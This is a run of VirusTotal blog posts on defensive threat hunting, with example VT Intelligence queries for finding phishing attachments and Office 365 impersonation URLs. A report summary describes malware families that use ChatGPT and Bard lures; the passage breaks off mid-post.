<div class="interval_12">
Finally, we will hunt URLs impersonating a corporate service provider, such as Office365. We will use the <b>“url”</b> modifier to match substrings contained in the URL string <b>(“url:office365”)</b>. In this scenario, we want to find URLs used by attackers to impersonate Office 365 built using Wordpress <b>(“path:wp-content”)</b>, and filter the ones with at least 5 detections <b>(“p:5+”)</b>. This kind of malicious URLs impersonate legitimate service providers and commonly redirect users to another location after providing their credentials, typically the legitimate site to avoid suspicion. We will check for this behaviour with the <b>“have:redirects_to”</b> modifier.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520url%253Aoffice365%2520have%253Aredirects_to%2520path%253Awp-content%2520p%253A5%252B/urls" target="_blank">entity:url url:office365 have:redirects_to path:wp-content p:5+</a></div>
<br />
<div class="interval_12">You can learn more about URL search modifiers in the <a href="https://docs.virustotal.com/docs/url-search-modifiers" target="_blank">documentation</a>.</div>
<div class="interval_12">As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>.</div>
<div class="interval_12">Happy hunting!</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
text-align: center;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-72458836671319172292023-12-11T18:41:00.000+01:002023-12-11T18:41:29.950+01:00Protecting the perimeter with VT Intelligence - Email security<div class="interval_12">Please note that this blogpost is part of our #VTMondays series, check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here.</a> </div>
<div class="interval_12">One of the most common attack vectors to gain access to your network is through phishing emails with attachments containing malware, usually the first stage in a cyberattack kill chain. By gathering intelligence related to the latest phishing campaigns targeting our country or industry, we can prevent emails with malicious attachments reaching our company’s inboxes. This adds a security layer by reducing the burden on employees and not solely relying on their intuition to identify threats.</div>
<div class="interval_12"> For this we will use <a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> to hunt threats targeting our email gateway. Our approach starts with a simple example and we will gradually increase its complexity. For each VT Intelligence query we provide a detailed breakdown of the new added modifiers. We encourage you to test the examples provided and to further explore new queries.</div>
<div class="interval_12">Our first basic query searches for documents <b>(“type:document”)</b> tagged as attachments <b>(“tag:attachment”)</b> and submitted from Spain <b>(“submitter:ES”)</b>. We will use the <b>“p”</b> modifier (“p” is short for “positives”, referring to the number of AntiVirus detections) to discard benign attachments. In this case, we want samples with more than 5 detections to avoid false positives, however this is completely at your discretion. Finally, we will look for files first seen (<b>“fs”</b> as short for first submission) in the last 14 days <b>(14d+)</b>.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/type%253Adocument%2520tag%253Aattachment%2520submitter%253AES%2520p%253A5%252B%2520fs%253A14d%252B/files" target="_blank">type:document tag:attachment submitter:ES p:5+ fs:14d+</a></div>
<br>
<div class="interval_12">Moving to the next stage, we will explore the submissions modifier to identify large-scale attacks, in this case <b>“submissions:50”</b> indicates the minimum number of submissions for a given file which may flag a massive phishing campaign. We use the name of an <b>AntiVirus engine</b> as a modifier to narrow down the results to potential blindspots. In this case, our strategy is searching for files flagged as “clean” by our AntiVirus and detected as malicious by at least 5 other engines.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/type%253Adocument%2520tag%253Aattachment%2520p%253A5%252B%2520fs%253A14d%252B%2520AhnLab%253Aclean%2520submissions%253A50%252B/files" target="_blank">type:document tag:attachment p:5+ fs:14d+ AhnLab:clean submissions:50+</a></div>
<br>
<div class="interval_12">Finally, we will create a bit more complex condition by combining boolean operators like <b>OR</b> and <b>NOT</b>. We search for specific document types such as <b>docs and spreadsheets</b>, and exclude other document types to narrow to a particular suspicious dynamic behaviour, particularly those actions associated with early stages of an attack. In this example we are searching for office documents either executing <b>powershell</b> or <b>executing macros running additional files</b> when detonated in the sandbox.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/(type%253Adoc%2520or%2520type%253Adocx%2520or%2520type%253Axls%2520or%2520type%253Axlsx)%2520p%253A5%252B%2520fs%253A7d%252B%2520(behaviour%253Apowershell%2520or%2520(tag%253Amacros%2520and%2520tag%253Arun-file))/files" target="_blank">(type:doc or type:docx or type:xls or type:xlsx) p:5+ fs:7d+ (behaviour:powershell or (tag:macros and tag:run-file)) </a></div>
<br>
<div class="interval_12">You can learn more about file search modifiers in the <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">documentation.</a></div>
<div class="interval_12">As always, we would like to <a href="https://virustotal.com/contact" target="_blank">hear from you.</a></div>
<div class="interval_12">Happy hunting! </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
text-align: center;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Pancho Perdomohttp://www.blogger.com/profile/09406313914317179794noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-12873062788204693532023-12-11T18:40:00.005+01:002023-12-29T12:20:08.908+01:00VTMondays<div style="text-align: left;"><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Welcome to VTMondays! </b>A</span><span style="font-size: 18.6667px; white-space-collapse: preserve;"> weekly series of bite-sized educational pills exploring the use of VirusTotal in real-world scenarios. </span><span style="font-size: 18.6667px; white-space-collapse: preserve;">Here's what you'll get:</span></div><div style="text-align: left;"><ul style="text-align: left;"><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Short lessons</b>: VTMondays are packed with valuable info in under 5 minutes read.</span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Real-world scenarios</b>: We're not talking theory, we're talking hunting malware, using intelligence to build up your defenses and staying ahead of the curve. </span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Actionable tips & best practices</b>: We'll equip you with practical hacks you can use right away. </span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Community connection</b>: Ask questions, share your experiences, and connect with other VirusTotal enthusiasts. </span></li></ul><span style="background-color: white; color: #202124; font-family: Roboto, arial, sans-serif; font-size: 13px; white-space-collapse: preserve;">Below you can find the link to the published and upcoming articles.</span><br /><div><ul style="text-align: left;">
<li><a href="https://blog.virustotal.com/2023/12/protecting-perimeter-with-vt.html">Threat detection - Email gateway</a> - 11th Dec</li>
<li><a href="https://blog.virustotal.com/2023/12/protecting-perimeter-with-vt_18.html">Threat detection - Malicious URLs</a> - 18th Dec</li>
<li><a href="https://blog.virustotal.com/2023/12/hunting-for-malicious-domains-with-vt.html">Threat detection - Malicious Domains</a> - 25th Dec</li>
<li><a href="https://blog.virustotal.com/2024/01/monitoring-malware-trends-with-vt.html">Threat detection - Monitoring malware trends </a> - 1st Jan</li>
</ul></div></div>Pancho Perdomohttp://www.blogger.com/profile/09406313914317179794noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-82126701566768734762023-11-29T13:14:00.000+01:002023-11-29T13:14:40.785+01:00How AI is shaping malware analysis<p><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">We just released our “</span><a href="https://assets.virustotal.com/reports/2023-ai" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">Empowering Defenders: How AI is shaping malware analysis</span></a><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">” report, where we want to share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks, this time focusing on how AI complements traditional malware analysis tools by providing a new functionality, leading to very significant time savings for analysts.</span><span style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Here are some of the main ideas presented:</span></p><span id="docs-internal-guid-e8af41b7-7fff-aa39-8e0f-7f27ac3fb3d6"><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI offers a different angle on malware detection, from a binary verdict to a detailed explanation.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI excels in identifying malicious scripts, particularly obfuscated ones, achieving up to 70% better detection rates compared to traditional methods alone.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI proved to be a powerful tool for detection and analysis of malicious scripting tool sets traditionally overlooked by security products. </span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI demonstrates enhanced detection and identification of scripts exploiting vulnerabilities, with an improvement on exploit identification of up to 300% over traditional tools alone.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">We observed suspicious samples using AI APIs or leveraging enthusiasm for AI products for distribution. However, AI usage in APT-like attacks cannot be confirmed at this time.</span></p></li></ul><div><span style="color: #4d4d4d; font-family: Google Sans, sans-serif;"><div class="separator" style="clear: both; text-align: center;"><a href="https://assets.virustotal.com/reports/2023-ai" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" data-original-height="387" data-original-width="665" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy6srh3O_U7A5u5yrxpR52t9LoLcQI_cTLqjjif5zgIBwfcsc29uPisOcnnNo0qR6sX8OLkayWjpQH9_8HCGdACaS1ragqnkB7_TeHwJYad6NdbL16cWIlK9mLZ14tSDd-vSYkwD7I-8kp1jqJmpDS8FQ32hoUIS3lb-Liin6bme9lMTFOkpryL_hMd9k/w640-h372/Frame%2097.png" width="640" /></a></div><br /><span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span></span></div><div><span id="docs-internal-guid-0dbf4121-7fff-ec65-7ae0-a1535674a763"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">For full details, you can </span><a href="https://assets.virustotal.com/reports/2023-ai" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">download the report here</span></a><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">. </span></p><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">The question most asked of VirusTotal since AI became more mainstream is “have you found any AI generated malware”. Detecting if any malware was “AI generated” is a challenging task. How does one trace where any source code comes from? We played with different ideas, trying to find unusual patterns in malware families and actors for the last 12 to 15 months. Through all of our research, we didn’t see any strong indicators. </span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">In this blog post we provide additional technical details for the AI-generated malware section of our report.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></p><h4 style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 3pt; padding: 0pt 0pt 11pt; text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Impersonation Tactics in the Age of AI</span></h4><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span id="docs-internal-guid-39e77815-7fff-dfb4-669a-59305828a090"></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; white-space-collapse: preserve;">As the popularity of certain applications and services grows, cybercriminals capitalize on this trend by impersonating them to infect unsuspecting victims. We observed different campaigns abusing ChatGPT and Google Bard iconography, file name and metadata for distribution. Despite ChatGPT's official launch in November 2022 and Google Bard's in February 2023, it wasn't until early 2023 that distinct patterns and spikes in malware exploiting their reputations emerged, highlighting the evolving tactics of cybercriminals in leveraging popular trends.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86AnZwZhJuvUunfFfc_ngNODJ40YNprU_HDqW6Ki3E7Px18yjWeUi6rAQciGxmsOPUig7TrUGNUIDckYwA0MWHhCI85nnolyEk8y1gP-CReP2JLvPXsLkSc7LZUFiROUzCSWeeXce4T8ef-pOemmZYjwDzzKWh61a47vIWFZOaxY8l2gqcrsB0vCJebc/s2480/Screenshot%202023-11-29%20at%2009.00.31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="2480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86AnZwZhJuvUunfFfc_ngNODJ40YNprU_HDqW6Ki3E7Px18yjWeUi6rAQciGxmsOPUig7TrUGNUIDckYwA0MWHhCI85nnolyEk8y1gP-CReP2JLvPXsLkSc7LZUFiROUzCSWeeXce4T8ef-pOemmZYjwDzzKWh61a47vIWFZOaxY8l2gqcrsB0vCJebc/s16000/Screenshot%202023-11-29%20at%2009.00.31.png" /></a></div><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; white-space-collapse: preserve;"><br /></span><p></p><div><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span id="docs-internal-guid-26c1fad6-7fff-6997-deab-c91ae2e34cb8"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Infostealers are the primary type of malware we've observed exploiting the reputations of ChatGPT and Google Bard. Families like Redline, Vidar, Raccoon, and Agent Tesla are among the most prevalent examples we've encountered. In addition, we found an extended list of Remote Access Trojans (RATs) families mimicking these applications, including DCRat, NjRAT, CreStealer, AsyncRAT, Lummac, RevengeRAT, Spymax, Aurora Stealer, Spynote, Warzone and OrcusRAT.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">In addition to Windows executables, the second most popular sample type is Android:</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibb9PM0gtroAIB0f25htSjhYVGszMDZfi-UCZmkThjbJLOapzzBWFeDiE01HjxLD9V3wnNKHrcJuTQQL_X-FWQ2sP0F01jHBH4Ih918jtr_ciHYRd0XAxhmXW5NxZMgjFYZ9eIONi5sONiaN5Rto4a_n3XyLjK5B1HfSus3DpmWmgPMPSnM8L0cLYyZVo/s2398/Screenshot%202023-11-29%20at%2009.02.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1424" data-original-width="2398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibb9PM0gtroAIB0f25htSjhYVGszMDZfi-UCZmkThjbJLOapzzBWFeDiE01HjxLD9V3wnNKHrcJuTQQL_X-FWQ2sP0F01jHBH4Ih918jtr_ciHYRd0XAxhmXW5NxZMgjFYZ9eIONi5sONiaN5Rto4a_n3XyLjK5B1HfSus3DpmWmgPMPSnM8L0cLYyZVo/s16000/Screenshot%202023-11-29%20at%2009.02.15.png" /></a></div><br /><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span><p></p><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-e69240a9-7fff-9ee8-6c63-89b190f287a6"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">As an example of infection vector, we found Redline samples deployed through a .bat file distributed inside a .zip bundling a </span><a href="https://www.virustotal.com/gui/file/12fadfc79cd9e8ad790af8a797d2984f2bd0b847d38e8e264e6b9dfa5da21ee8" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">document</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> called "GPT CHAT INSTALLATION INSTRUCTIONS.docx":</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyAksXSjwuI9hsghMdNmjsf147w4LSkqPeCjk-LYkBvdJHFIUOCc4Paz7_tFN4OgqNSd7nZguC9qqyJHLKIWnBjR8VP25We_Xl0GXaRXudr9tPlbdaTP-03f9TMzpakm01isvgtuIgpJW8XXrzyeA6Klb-Ogv_vgj258wzDS1bS2entuguKCmm2plc3XU/s1880/Screenshot%202023-11-29%20at%2009.03.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1394" data-original-width="1880" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyAksXSjwuI9hsghMdNmjsf147w4LSkqPeCjk-LYkBvdJHFIUOCc4Paz7_tFN4OgqNSd7nZguC9qqyJHLKIWnBjR8VP25We_Xl0GXaRXudr9tPlbdaTP-03f9TMzpakm01isvgtuIgpJW8XXrzyeA6Klb-Ogv_vgj258wzDS1bS2entuguKCmm2plc3XU/s16000/Screenshot%202023-11-29%20at%2009.03.26.png" /></a></div><br /><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-3e67ff58-7fff-1c32-31cf-c8eb3e980fc7"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Another distribution vector is through the use of </span><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline;">ISO images</span><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. We found a </span><a href="https://www.virustotal.com/gui/file/fc5440be62559fcdd4c2d5726a41c3045e149277624b4cebc793f333324c7f21/relations" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Vidar</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> sample distributed through "ChatGPT For Dummies 2st Edition.iso".</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Other interesting findings include a Bumblebee </span><a href="https://www.virustotal.com/gui/file/9982330ae990386cd74625f0eaa26ae697574694eb2ec330c2acac5e0149fdc0/relations" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> distributed as “ChatGPT_Setup.msi”, or a </span><a href="https://www.virustotal.com/gui/file/7d0d9cb75046c78bd8d69889d1e7e4023ae3d2ff39de4150a96ef57609c24e08/details" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> (“ChatGPT_0.12.0_windows_x86_64.exe”) using drivers to probably escalate privileges. “</span><a href="https://www.virustotal.com/gui/file/8aba6752b94d97b687611a1d740b17db5eca75661e49cc7e5ce67c0a5ade28f4/details" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">ChatGPT Complete Guide For Developers Students And Worrkers 2023.exe</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; 